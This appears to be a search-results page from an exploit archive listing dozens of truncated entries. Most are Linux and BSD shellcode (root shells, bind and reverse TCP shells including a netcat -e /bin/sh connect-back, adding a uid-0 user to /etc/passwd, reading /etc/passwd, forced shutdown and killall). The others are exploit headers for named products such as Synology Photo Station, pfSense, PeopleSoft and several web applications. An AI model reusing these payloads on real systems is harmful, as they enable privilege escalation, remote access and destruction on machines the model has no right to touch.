39001 matches found
Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push $0x74756873 "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69 "\x68\x2f\x2f\x73\x62" // push $0x62732f2f "\x89\xe3" // mov...
BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...
Synology Photo Station 6.8.2-3461 - SYNOPHOTO_Flickr_MultiUpload Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/local/bin/python """ Synology Photo Station = 6.8.2-3461 latest SYNOPHOTOFlickrMultiUpload Race Condition File Write Remote Code Execution Vulnerability Found by: mrme Tested: 6.8.2-3461 latest at the time Vendor Advisory:...
Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)
include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e "\x68\x2f\x73\x62\x69" // push $0x6962732f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // pu...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can...
Shibboleth 2 XML Injection Vulnerability
RedTeam Pentesting discovered that the shibd service of Shibboleth 2 does not extract SAML attribute values in a robust manner. By inserting XML entities into a SAML response, attackers may truncate attribute values without breaking the document's signature. This might lead to a complete bypass o...
BSD/x86 - execve (/bin/sh) + seteuid(0) Shellcode (31 bytes)
/ simply execvebinsh+seteuid0 shellcode in 31 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org nerf nerf /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"...
Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 36 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callit doit: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al mov byte al,83 lea ebx,esi lea ecx,esi+8 int...
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
/ writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax push eax push byte 0x64 push word 0x7773 push long 0x7361702f push long 0x6374652f mov ebx,esp mov al,0x0...
Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)
include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+ Author: TheWorm" "\n\n+ Shellcode Size: %d bytes\n\n", sizeofshellcode-1; void...
Seagate Media Server Arbitrary File / Folder Deletion Vulnerabilities
Seagate Media Server on a Seagate Personal Cloud model SRN21C running firmware version 4.3.16.0 suffers from an unauthenticated arbitrary file and folder deletion vulnerability. ------------------------------------------------------------------------ Seagate Media Server allows deleting of...
VTech DigiGo 83.60630 Browser Overlay Attack Vulnerability
Exploit for cgi platform in category web applications ------------------------------------------------------------------------ Multiple vulnerabilities in VTech DigiGo allow browser overlay attack ------------------------------------------------------------------------ Sipke Mellema, September 20...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do the setuid0. If you don't want this you can write "\x6a\x0b\x58" instead of "\xb0\x0b", but the...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena con un 0 "\x68\x63\x6f\x6e\x76" //push dword...
ImgHosting 1.5 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting Date: 12-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: foxsash.com Version: 1.5 CVE-ID: CVE-2018-5479 ImgHostin...
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
; Title: Shellcode linux/x86-64 bind-shell with netcat ; Author : Gaussillusion ; Len : 131 bytes ; Language : Nasm BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr rcx,0x08 push rcx mov rcx,rsp mov rbx,0x652dffffffffffff shr rbx,0x30...
RISE 1.9 - search SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 30/12/2017 CVE: CVE-2017-17999 Vendor Homepage: http://fairsketch.com/ Version: 1.9 POST...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with echo cmd ; tested kali linux , kernel 3.12 global start start: jmp short findaddress realstart: pop rdi xor byte rdi + 7 , 0x41 ;...
Linux/x86-64 - setreuid(0,0) + execve(/bin/ash,NULL,NULL) + XOR Encoded Shellcode (85 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/ash",NULL,NULL + XOR encoded - 85 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes egg + code ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global start jmp short start startcode :...
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
/ ; Title: shutdown -h now x8664 Shellcode - 65 bytes ; Platform: linux/x8664 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h m...
Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
; Author Doreth.Z10 ; ; Linux x8664 Egghunter using sysaccess ; Shellcode size 49 bytes ; global start section .text start: xor rsi, rsi ; Some prep junk. push rsi pop rdx push 8 pop rbx goendofpage: or dx, 0xfff ; We align with a page size of 0x1000 nextbyte: inc rdx ; next byte offset push 21 p...
Ruby on Rails gem version 1.4 delayed_job_web XSS Vulnerability
Exploit for ruby platform in category web applications Summary An exploitable XSS vulnerability exists in the filter functionality of the delayedjobweb rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the...
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
/ Title : tcpbindshell 150 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D tcpbindshell -M intel tcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax...
OpenBSD/x86 - reboot() Shellcode (15 bytes)
// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...
Linux/x86-64 - setreuid(0,0) + execve(/bin/ksh, [/bin/ksh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
;BindTCP 4444 with password ; ;Default password = Password ; ;If connected the shellcode no prompt for password ; ;Enter password directly and you get the bin/sh shell; ;if password is wrong the shellcode exit: ; ;Christophe G SLAE64 - 1337 size 173 bytes ; global start start: ; sock =...
pfSense < 2.1.4 - status_rrd_graph_img.php Command Injection Exploit
Exploit for php platform in category web applications !/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/...
Linux/x86-64 - Add User (pwned/$pass$) Using open,write,close Shellcode (358 bytes)
; shellcode name adduserpasswordJCPopen,write,close ; Author : Christophe G SLAE64-1337 ; Len : 358 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with open,write,close ; tested kali linux , kernel 3.12 global start start: xor rax , rax push rax pop rsi push rax ...
Linux/x86-64 - setreuid(0,0) + execve(/bin/zsh, [/bin/zsh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 byte
; Title: Shellcode linux/x86-64 connect back shell ; Author : Gaussillusion ; Len : 109 bytes ; Language : Nasm ;syscall: execve"/bin/nc","/bin/nc","ip","1337","-e","/bin/sh",NULL BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr...
ILIAS CMS 5.2.3 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Cross Site Scripting in ILIAS CMS 5.2.3 Date: Apr 24, 2017 Software Link: https://www.ilias.de Exploit Author: Florian Kunushevci Contact: https://facebook.com/florianx00 CVE: CVE-2018-5688 Category: webapps 1. Description ILIAS...
Oracle PeopleSoft 8.5x - Remote Code Execution Vulnerability
Exploit for java platform in category web applications Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 Date: 30 Oct 2017 Exploit Author: Vahagn Vardanyan Vendor Homepage: Oracle Software Link: Oracle PeopleSoft Version: 8.54, 8.55, 8.56 Tested on: Windows, Linux...
Ruby on Rails gem version 1.2.0 rails_admin XSS Vulnerability
Exploit for ruby platform in category web applications Summary An exploitable XSS vulnerability exists in the add filter functionality of the railsadmin rails gem version 1.2.0. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on th...
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (1
/ ; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322 ; 138 bytes global start section .text start: ;socket syscall push byte 0x29 ; 41 socket pop rax push byte 0x2 ; AFINET pop rdi push byte 0x1 ; SOCKSTREAM pop rsi cdq ;rdx = 0 - ANY syscall xchg rdi, rax ; save socket descriptor mov dwo...
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect Vulnerability
Exploit for jsp platform in category web applications Exploit Title: Oracle E-Business suite Open Redirect Google Dork: inurl:OAHTML/cabo/ Date: April 2017 Exploit Author: author Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html Software Link: download...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
/ ;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322 ;175 bytes ;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html global start section .text start: push byte 0x29 ; 41 - socket syscall pop rax push byte 0x02 ; AFINET pop rdi push byte 0x01 ; SOCKSTREAM pop rsi...
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-867.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 105 bytes got shorter by 13 bytes ; ; What's new is that some...
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
/ Title : reversetcpbindshell 118 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: ...
Linux/x86-64 - setreuid(0,0) + execve(/bin/csh, [/bin/csh, NULL]) + XOR Encoded Shellcode (87 bytes)
Title: Linux x86-64 setreuid 0,0 & execve"/bin/csh", "/bin/csh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...
Domains & Hostings Manager PRO 3.0 - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Domains & Hostings Manager PRO v 3.0 - Authentication Bypass Date: 13.01.2018 Vendor Homepage: http://endavi.com/ Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735 Demo:...
PerfexCRM 1.9.7 - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: PerfexCRM 1.9.7 – Unrestricted php5 File upload Exploit Author: Ahmad Mahfouz Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin Contact:...
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 byt
; =================================================================== ; Password Protected Reverse Shell ; Author: SLAE64-1351 Keyman ; Date: 04/09/2014 ; ; Shellcode length: 136 bytes ; ; Description: ; ; Simple reverse shell listens on port 4444 by default with ; bytes password protection. Usin...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
; =================================================================== ; Password Protected Bind Shell ; Author: SLAE64-1351 Keyman ; Date: 03/09/2014 ; ; Shellcode length: 147 bytes ; ; Description: ; ; Simple bind shell listens on port 4444 by default with 4 bytes ; password protection. Using a ...
OBS studio 20.1.3 - Local Buffer Overflow Exploit
Exploit for windows platform in category dos / poc author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: email protected Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day SEH Based PoC Date: 2018.01.15 Exploit Author: Greg Priest Version: OBS-Studio-20.1.3 Tested on: Windows7 x...
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; sethostname"Rooted !"; ; kill-1, SIGKILL; section .text global start start: ;-- setHostName"Rooted !"; 22 bytes --; mov al, 0xaa mov r8, 'Rooted !' push r8 mov rdi, rsp mov sil,...